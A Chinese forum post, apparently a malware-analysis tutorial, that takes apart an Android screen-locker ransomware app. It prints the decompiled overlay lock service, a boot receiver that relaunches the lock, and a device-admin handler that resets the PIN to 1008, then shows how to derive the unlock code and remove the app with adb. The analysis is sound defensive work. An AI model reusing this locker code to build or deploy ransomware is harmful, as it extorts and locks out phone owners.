当我们激活设备管理器的时候，会触发onEnable()方法，代码中也可以看出来，直接启动了com.h.s，并且重设锁屏密码为1008

那我们现在来看看这个com.h.s

[Java] 纯文本查看 复制代码

?

001 002 003 004 005 006 007 008 009 010 011 012 013 014 015 016 017 018 019 020 021 022 023 024 025 026 027 028 029 030 031 032 033 034 035 036 037 038 039 040 041 042 043 044 045 046 047 048 049 050 051 052 053 054 055 056 057 058 059 060 061 062 063 064 065 066 067 068 069 070 071 072 073 074 075 076 077 078 079 080 081 082 083 084 085 086 087 088 089 090 091 092 093 094 095 096 097 098 099 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222

package com.h;    import adrt.ADRTLogCatReader; import android.app.Application; import android.app.Service; import android.content.Context; import android.content.Intent; import android.content.SharedPreferences; import android.content.SharedPreferences$Editor; import android.net.NetworkInfo; import android.os.IBinder; import android.view.LayoutInflater; import android.view.View; import android.view.View$OnClickListener; import android.view.WindowManager; import android.view.WindowManager$LayoutParams; import android.widget.Button; import android.widget.EditText; import android.widget.TextView;    public class LockScreen extends Service {     class myThread extends Thread {         private final LockScreen this$0;            myThread(LockScreen arg1) {             super();             LockScreen.this = arg1;         }            static LockScreen access$0(myThread arg1) {             return arg1.this$0;         }            public void run() {         }     }        class ClickListener implements View$OnClickListener {         private final LockScreen this$0;            ClickListener(LockScreen arg1) {             super();             LockScreen.this = arg1;         }            static LockScreen access$0(ClickListener arg1) {             return arg1.this$0;         }            @Override public void onClick(View arg6) {             try {                 if(!LockScreen.this.edittext.getText().toString().equals(LockScreen.this.du.decrypt(                         LockScreen.this.sharedpreferences.getString("passw", "")))) {                     return;                 }                    LockScreen.this.mWindowManager.removeView(LockScreen.this.mFloatLayout);                 LockScreen.this.stopSelf();             }             catch(Exception exception0) {             }         }     }        Button button;     DU du;     EditText edittext;     SharedPreferences$Editor editor;     private View mFloatLayout;     private WindowManager mWindowManager;     long randomNumber;     Long passw;     String password;     String ppss;     SharedPreferences sharedpreferences;     TextView textview;     private WindowManager$LayoutParams wmParams;        public LockScreen() {         super();     }        static WindowManager access$L1000001(LockScreen LockScreen_this) {         return LockScreen_this.mWindowManager;     }        static View access$L1000002(LockScreen LockScreen_this) {         return LockScreen_this.mFloatLayout;     }        static void access$S1000001(LockScreen LockScreen_this, WindowManager arg7) {         LockScreen_this.mWindowManager = arg7;     }        static void access$S1000002(LockScreen LockScreen_this, View arg7) {         LockScreen_this.mFloatLayout = arg7;     }        private void c() {         LockScreen LockScreen_this = this;         LockScreen_this.wmParams = new WindowManager$LayoutParams();         Application application0 = LockScreen_this.getApplication();         LockScreen_this.getApplication();         LockScreen_this.mWindowManager = application0.getSystemService(Context.WINDOW_SERVICE);         LockScreen_this.wmParams.type = 2010;         LockScreen_this.wmParams.format = 1;         LockScreen_this.wmParams.flags = 1280;         LockScreen_this.wmParams.gravity = 49;         LockScreen_this.wmParams.x = 0;         LockScreen_this.wmParams.y = 0;         LockScreen_this.wmParams.width = -1;         LockScreen_this.wmParams.height = -1;         LockScreen_this.mFloatLayout = LayoutInflater.from(LockScreen_this.getApplication()).inflate(                 2130903041, null);         LockScreen_this.mWindowManager.addView(LockScreen_this.mFloatLayout, LockScreen_this.wmParams);         LockScreen_this.button = LockScreen_this.mFloatLayout.findViewById(2131296258);         LockScreen_this.edittext = LockScreen_this.mFloatLayout.findViewById(2131296257);         LockScreen_this.textview = LockScreen_this.mFloatLayout.findViewById(2131296256);         LockScreen LockScreen_this = LockScreen_this;         try {             LockScreen_this.edittext.setHint("宝贝在这输入密码哦！");             LockScreen_this.textview.append("随机码:");         }         catch(Exception exception0) {         }            LockScreen_this.button.setOnClickListener(new ClickListener(LockScreen_this));         LockScreen_this = LockScreen_this;         try {             LockScreen_this.textview.append(new StringBuffer().append(new StringBuffer().append("\n")                     .append(LockScreen_this.du.decrypt("e60b6ba97b41a1c7a31f1228d55280a8243703be7d4aa15c"))                     .toString()).append(LockScreen_this.sharedpreferences.getLong("m", ((long)0))).toString());         }         catch(Exception exception0) {         }     }        public boolean is(Context arg9) {         boolean bool;         Context context = arg9;         if(context != null) {             NetworkInfo networkInfo = context.getSystemService("connectivity").getActiveNetworkInfo();             if(networkInfo != null) {                 bool = networkInfo.isAvailable();             }             else {                 goto label_17;             }         }         else {         label_17:             bool = false;         }            return bool;     }        @Override public IBinder onBind(Intent arg5) {         return null;     }        @Override public void onCreate() {         LockScreen LockScreen_this = this;         ADRTLogCatReader.onContext(LockScreen_this, "com.aide.ui");         super.onCreate();         LockScreen_this.randomNumber = ((long)(Math.random() * (((double)100000000))));  // 先生成随机数randomNumber         LockScreen_this.passw = new Long(LockScreen_this.randomNumber + (((long)111)));  // randomNumber加上111         LockScreen_this.du = new DU("flower");  // 初始化一个du对象         LockScreen LockScreen_this = LockScreen_this;         try {             LockScreen_this.du = new DU(LockScreen_this.du.decrypt("c29fe56fa59ab0db"));         }         catch(Exception exception0) {         }            LockScreen_this.sharedpreferences = LockScreen_this.getSharedPreferences("Flowers", 0);         LockScreen_this.editor = LockScreen_this.sharedpreferences.edit();         if(LockScreen_this.sharedpreferences.getLong("m", ((long)0)) == (((long)0))) {             LockScreen_this.editor.putLong("m", LockScreen_this.randomNumber);             LockScreen_this.editor.commit();             LockScreen_this = LockScreen_this;             try {                 LockScreen_this.editor.putString("passw", LockScreen_this.du.encrypt(new StringBuffer()                         .append("").append(LockScreen_this.passw).toString()));                 LockScreen_this.editor.commit();             }             catch(Exception exception0) {             }                if(LockScreen_this.is(LockScreen_this.getApplicationContext())) {                 LockScreen_this.ppss = new StringBuffer().append(LockScreen_this.sharedpreferences.getLong(                         "m", ((long)8))).append("").toString();                 LockScreen_this = LockScreen_this;                 LockScreen LockScreen_this = LockScreen_this;                 try {                     LockScreen_this.password = LockScreen_this.du.decrypt(LockScreen_this.sharedpreferences                             .getString("passw", ""));                 }                 catch(Exception exception0) {                 }                    new myThread(LockScreen_this).start();                 return;             }                LockScreen_this = LockScreen_this;             try {                 LockScreen_this.editor.putLong("m", Long.parseLong(LockScreen_this.du.decrypt("5a15e58cc8db8d1c700ecb6bb7b627a9")));                 LockScreen_this.editor.commit();                 LockScreen_this.editor.putString("passw", "c8c0ae88e6d1aeb8a2bcb7274e242414");                 LockScreen_this.editor.commit();             }             catch(Exception exception0) {             }         }     }        @Override public void onStart(Intent intent, int arg9) {         super.onStart(intent, arg9);         this.c();     } }

代码看起来很复杂，也很多，一堆加密解密的，但是不管它如何加密，所有代码都是本地执行的，都是可以恢复出来的

一步步来分析如何锁屏，以及如何解锁

Server的生命周期以前的有说过，第一次启动会执行onCreate()，然后执行onStartCommand()，以后的启动只会执行onStartCommand()

所以来看onCreate()

会先random出一个随机数，然后加111,后面就是各种加密了

至于为什么会知道这是随机数和解锁密码，后面继续看

onCreate()方法执行完后会onStartCommand()方法

这个方法就执行了一个c方法，这个方法主要是用于显示，刚刚我们那个解锁序列号就是在这里进行读取然后显示的

这样就知道了解锁序列号在sharedpreferences里的键是“m”

既然有输入框，那么必然有button的Listener方法，这个思维学开发的比较容易想到

这里就是进行解锁密码校验的地方，sharedpreferences文件里passw的键值就是加密后的解锁密码

讲到这里，肯定有同学会疑惑，为什么那么多加密解密的代码不分析？

是这样的，作者的思路是：首先random一个随机数randomNumber当序列号，加密后在sharedpreferences里的键为m，然后将randomNumber加上111，加密后在sharedpreferences里的键为passw，但是在存储的时候，这两个键值是加密的，看着很难办对吧？

脑残就脑残在，最终还不是要解密进行对比

所以那些加密解密什么的都是摆设

现在解锁方法已经知道了，来解锁吧

解锁密码是序列号加111，成功解开，进入桌面，发现桌面有两个图标，右边那个就是锁机apk了

哎我说这位同学，你怎么能骂人呢？

锁机不成仁义在啊！！！！！！

卸载掉左边那个apk，然后点击右边那个apk看看，出现激活

这个地方需要补充解释一下，刚才我们卡住了，所以强行关闭重启，作者的想法也是重启

因为有开机自启动的Receiver，这个Receiver直接启动了com.h.s，所以直接出现了锁机界面，而不是依照MainActivity里面弹出激活界面

[Java] 纯文本查看 复制代码

?

01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28

package com.h;    import android.content.BroadcastReceiver; import android.content.Context; import android.content.Intent;    public class BootReceiver extends BroadcastReceiver {     public BootReceiver() {         super();     }        @Override public void onReceive(Context context, Intent intent) {         Class class0;         if(intent.getAction().equals("android.intent.action.BOOT_COMPLETED")) {             this.abortBroadcast();             try {                 class0 = Class.forName("com.h.s");             }             catch(ClassNotFoundException classNotFoundException0) {                 throw new NoClassDefFoundError(((Throwable)classNotFoundException0).getMessage());             }                Intent intent = new Intent(context, class0);             intent.addFlags(268435456);             context.startService(intent);         }     } }

继续来看这里，我们点击激活后，又会出现锁屏界面，锁屏界面的密码是解锁序列号加111，并且设置手机自带锁屏密码为1008

当我们取消激活的时候，也会把锁屏密码改为1008

[Java] 纯文本查看 复制代码

?

1 2 3 4 5 6 7

@Override public CharSequence onDisableRequested(Context context, Intent intent) {         String string = Integer.toString(1008);         this.getManager(context).lockNow();         this.getManager(context).resetPassword(string, 0);         return super.onDisableRequested(context, intent); }

取消激活直接锁屏，密码是1008

然后就是清除这个app，因为释放进了system/app，不能直接卸载

上adb

[Shell] 纯文本查看 复制代码

?

1 2	root@android:/system/app # mount -o rw,remount yaffs2 /system root@android:/system/app # rm zihao.apk

所以，谁是傻逼？？？

锁机这东西，很大部分都是比较弱的，牛逼的锁机能用来锁你？？？

对吧，而且现在的加固厂商一般都会检测恶意代码的，所以有很多的锁机样本都像这个，假装某加固的so文件

还有，很多人用的都是别人的锁机源码，这些源码随便搜都能找到，多学习这些源码，以后分析万一就碰上了呢？

以后要是被锁机了，找找教程，跟着分析，分析出来了可以写篇教程或者心得分享嘛，我给你加热心啊！！！！！！

最后，不要给来路不明的apk设备管理器的权限！！！！！！

不定期的会录制一些视频分享调试的一些心得：移动恶意APP分析的心得分享

州哥在江湖

不要给来路不明的apk设备管理器的权限！！！！！！

wnagzihxain

Virenz 发表于 2016-7-21 15:46
锁机的软件几乎大同小异

不是的，因为很多人并不会开发，用的都是别人的锁机代码，导致了一片的锁机都长得很像，但是最近我收集到的样本来看，有几个将关键代码写进了so，还有的自带root(利用漏洞root受害者的手机)，那几个的强度不是这次的样本能够比的，种种原因不方便放出分析和样本，怕被查水表，再发展一段时间，锁机估计会开始将关键代码写进so，以后的分析难度会更大

7794857

火钳留名     

qwe2913207

前排留名 明天就置顶了

捂着心脏说胃疼_

大神请收下我的膝盖！！！

2585281523

多谢大神分析   而且还很到位

我来看看看

谢谢 学习了

枫MapleLCG

前排留名，膜拜版主大大！吐槽一下，现在的模拟器的界面好像iPlay啊。

hack7788

楼主好厉害

Zod

大神请收下我的膝盖！！！

黑涩梧桐叶

写锁屏软件的人太特么缺德了